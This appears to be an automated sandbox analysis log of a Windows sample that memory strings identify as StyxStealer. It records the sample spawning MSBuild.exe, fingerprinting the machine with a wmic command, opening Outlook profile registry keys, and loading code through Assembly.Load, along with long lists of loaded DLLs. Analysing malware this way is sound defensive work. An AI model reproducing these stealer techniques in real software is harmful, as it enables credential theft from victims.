                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05B66FE82_2_05B66FE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05BC5C7F2_2_05BC5C7F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05BCA8582_2_05BCA858
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05BCEAFB2_2_05BCEAFB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05BC7AD02_2_05BC7AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05BCA0F02_2_05BCA0F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C05DA02_2_05C05DA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C0BD702_2_05C0BD70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C037902_2_05C03790
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C0B7912_2_05C0B791
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C07FB82_2_05C07FB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C057492_2_05C05749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C08F602_2_05C08F60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C071602_2_05C07160
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C0C1082_2_05C0C108
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C048C22_2_05C048C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C0A0A82_2_05C0A0A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C000402_2_05C00040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C068682_2_05C06868
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C0BD602_2_05C0BD60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C0453F2_2_05C0453F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C034B02_2_05C034B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C037802_2_05C03780
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C018402_2_05C01840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C0D2022_2_05C0D202
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C0D2102_2_05C0D210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05D06C202_2_05D06C20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05D00BC82_2_05D00BC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05D010402_2_05D01040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05D038D02_2_05D038D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05D03B002_2_05D03B00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05D047702_2_05D04770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05D02BB32_2_05D02BB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05D02BB82_2_05D02BB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05D077A02_2_05D077A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05D010322_2_05D01032
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05D03AF02_2_05D03AF0
                  Source: d34e1p5zD2.exe, 00000000.00000002.2129703847.0000000002562000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegh2q.dll4 vs d34e1p5zD2.exe
                  Source: d34e1p5zD2.exe, 00000000.00000002.2129641968.0000000002350000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamegh2q.dll4 vs d34e1p5zD2.exe
                  Source: d34e1p5zD2.exe, 00000000.00000002.2129703847.0000000002541000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStyxStealer.exe8 vs d34e1p5zD2.exe
                  Source: d34e1p5zD2.exe, 00000000.00000002.2129759633.0000000012549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStyxStealer.exe8 vs d34e1p5zD2.exe
                  Source: classification engineClassification label: mal96.spyw.evad.winEXE@7/4@2/3
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Victim_SID[1].bdJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5044:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: d34e1p5zD2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: d34e1p5zD2.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: d34e1p5zD2.exeReversingLabs: Detection: 13%
                  Source: d34e1p5zD2.exeVirustotal: Detection: 13%
                  Source: unknownProcess created: C:\Users\user\Desktop\d34e1p5zD2.exe "C:\Users\user\Desktop\d34e1p5zD2.exe"
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUID
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUIDJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: d34e1p5zD2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: d34e1p5zD2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: d34e1p5zD2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\Users\frede\OneDrive\Ambiente de Trabalho\Outputs\Ejicaj.pdb@ source: d34e1p5zD2.exe
                  Source: Binary string: C:\Users\frede\OneDrive\Ambiente de Trabalho\Outputs\Ejicaj.pdb source: d34e1p5zD2.exe

                  Data Obfuscation

                  barindex
                  Source: d34e1p5zD2.exe, PreventFromWeb.cs.Net Code: FOBDestination System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeCode function: 0_2_00007FF848D700BD pushad ; iretd 0_2_00007FF848D700C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_011B9260 push esp; ret 2_2_011B9261
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05B66BA1 push esi; ret 2_2_05B66BA2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05B66A9E push esi; ret 2_2_05B66A9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05B66A36 push esi; ret 2_2_05B66A37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C015DA push eax; mov dword ptr [esp], ecx2_2_05C015EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C02D80 push eax; mov dword ptr [esp], ecx2_2_05C02D94
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C016BA push eax; mov dword ptr [esp], ecx2_2_05C016C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 2_2_05C02BF1 push eax; mov dword ptr [esp], ecx2_2_05C02C04
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\d34e1p5zD2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
